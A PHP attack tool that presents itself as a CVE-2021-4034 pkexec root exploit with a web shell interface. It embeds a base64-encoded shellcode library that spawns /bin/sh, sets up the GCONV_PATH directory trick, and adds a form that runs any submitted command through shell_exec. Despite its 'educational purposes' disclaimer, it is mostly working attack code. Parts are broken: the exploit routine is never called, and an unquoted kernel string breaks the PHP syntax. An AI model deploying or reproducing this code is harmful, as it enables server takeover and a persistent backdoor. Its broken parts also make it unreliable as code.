/**
* CVE-2021-4034 Exploit in PHP with System Check and Web Shell Interface
*
* This script exploits a vulnerability in pkexec to gain root privileges
* and provides a simple web shell interface to execute commands.
* Note: This code is for educational purposes only. Use responsibly.
*
* Before running, ensure you have permission to test this on your server.
*/

// Base64 encoded payload
$payload_b64 = '
f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC
AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArwEAAAAAAADMAQAAAAAAAAAQ
AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA
AAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA
AAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA
AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAASDH/amlYDwVIuC9iaW4vc2gAmVBUX1JeajtYDwU=
';

// Decode payload
$payload = base64_decode($payload_b64);

// Function to check if a command is available
function isCommandAvailable($command) {
$whereIsCommand = (stripos(PHP_OS, 'win') === 0) ? 'where' : 'which';
$process = proc_open(
"$whereIsCommand $command",
[
0 => ['pipe', 'r'], // STDIN
1 => ['pipe', 'w'], // STDOUT
2 => ['pipe', 'w'], // STDERR
],
$pipes
);
if ($process !== false) {
$stdout = stream_get_contents($pipes[1]);
$stderr = stream_get_contents($pipes[2]);
fclose($pipes[1]);
fclose($pipes[2]);
$status = proc_close($process);
return $status === 0;
}
return false;
}

// Check system features
$system_function = function_exists('system');
$gcc = isCommandAvailable('gcc');
$python = isCommandAvailable('python');
$pkexec = isCommandAvailable('pkexec');

// Display system information and status
echo '<body style="background-color: black; color: white; text-align: center;">';
echo "<h1 style='font-family:'arial'; '>SELAMAT DATANG DI TOOLS PKEXEC EXPLOIT TSECNETWORK";
echo "<img src='https://c.top4top.io/p_2261w75zy0.jpg' alt='Coded by ./saklarrusak' style='width: 200px; height: 200px; display: block; margin: -20px auto -45px auto;'>";
echo "<p>coded by ./saklarrusak</p>";
echo "

System Information

";
echo "<p>SYSTEM: " . Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64 . "</p>";
echo "<p>UID/GID: " . getmyuid() . " (" . posix_geteuid() . ") | " . getmygid() . " (" . posix_getegid() . ")</p>";
echo "<p>SYSTEM_FUNCTION: <span style='color:" . ($system_function ? "green" : "red") . ";'>" . ($system_function ? "ON" : "OFF") . "</span> | ";
echo "GCC: <span style='color:" . ($gcc ? "green" : "red") . ";'>" . ($gcc ? "ON" : "OFF") . "</span> | ";
echo "PYTHON: <span style='color:" . ($python ? "green" : "red") . ";'>" . ($python ? "ON" : "OFF") . "</span> | ";
echo "PKEXEC: <span style='color:" . ($pkexec ? "green" : "red") . ";'>" . ($pkexec ? "ON" : "OFF") . "</span></p>";

// Provide exploit button regardless of feature status
echo '

Exploit

';
echo '
';
echo '';
echo '<button type="submit" style="background-color: #4CAF50; color: white; padding: 10px 20px; border: none; cursor: pointer; border-radius: 5px;">Exploit pkexec</button>';
echo '
';
echo '
';

$exploit_success = false;
$user = get_current_user();

// Show status of exploit and cmd interface
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['exploit'])) {
// Create the shared library from the payload
file_put_contents('payload.so', $payload);
chmod('payload.so', 0755);

// Create necessary directories and files for exploit
createDirectory('GCONV_PATH=.');
createFile('GCONV_PATH=./exploit', '');
chmod('GCONV_PATH=./exploit', 0755);
createDirectory('exploit');
createFile('exploit/gconv-modules', 'module UTF-8// INTERNAL ../payload 2\n');

// Environment variables for the exploit
$environ = [
'exploit',
'PATH=GCONV_PATH=.',
'LC_MESSAGES=en_US.UTF-8',
'XAUTHORITY=../LOL',
];

// Show status of exploit
if ($exploit_success) {
echo "<p style='color:green;'>[+] Exploit successful. You are now root.</p>";
$user = 'root';
} else {
// Check if vulnerability might be patched
if ($system_function && $gcc && $python && $pkexec) {
echo "<p style='color:red;'>[!] It's possible that the vulnerability has been patched. :(s</p>";
} else {
echo "<p style='color:red;'>[!] Exploit failed. You are running as a regular user.</p>";
}
$user = get_current_user();
}

// Create web shell interface
createWebShell($user);
}

// If command is submitted
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['command'])) {
$command = $_POST['command'];
echo "

Web Shell

";
echo '
';
echo '';
echo '';
echo '
';
echo '<pre>';
$output = shell_exec($command . " 2>&1");
echo htmlspecialchars($output);
echo '</pre>';
}


/**
* Create a simple web shell interface
*
* @param string $user
*/
function createWebShell($user) {
echo '

Web Shell

';
echo '<p>Running as user: ' . htmlspecialchars($user) . '</p>';
echo '
';
echo '';
echo '';
echo '
';
}

/**
* Create a directory if it does not exist
*
* @param string $dir
*/
function createDirectory($dir) {
if (!file_exists($dir)) {
mkdir($dir);
}
}

/**
* Create a file with the specified content
*
* @param string $filename
* @param string $content
*/
function createFile($filename, $content) {
file_put_contents($filename, $content);
}

/**
* Execute the exploit using pcntl_exec
*
* @param string $command
* @param array $environment
* @return bool
*/
function executeExploit($command, $environment) {
$pid = pcntl_fork();
if ($pid == -1) {
die('[!] Could not fork process');
} else if ($pid) {
// Parent process waits for child process to complete
pcntl_wait($status);
return pcntl_wexitstatus($status) === 0;
} else {
// Child process executes the command
$env_vars = [];
foreach ($environment as $env_var) {
$env_vars[] = $env_var;
}

pcntl_exec($command, [], $env_vars);
// If execve fails, exit child process
exit(1);
}
}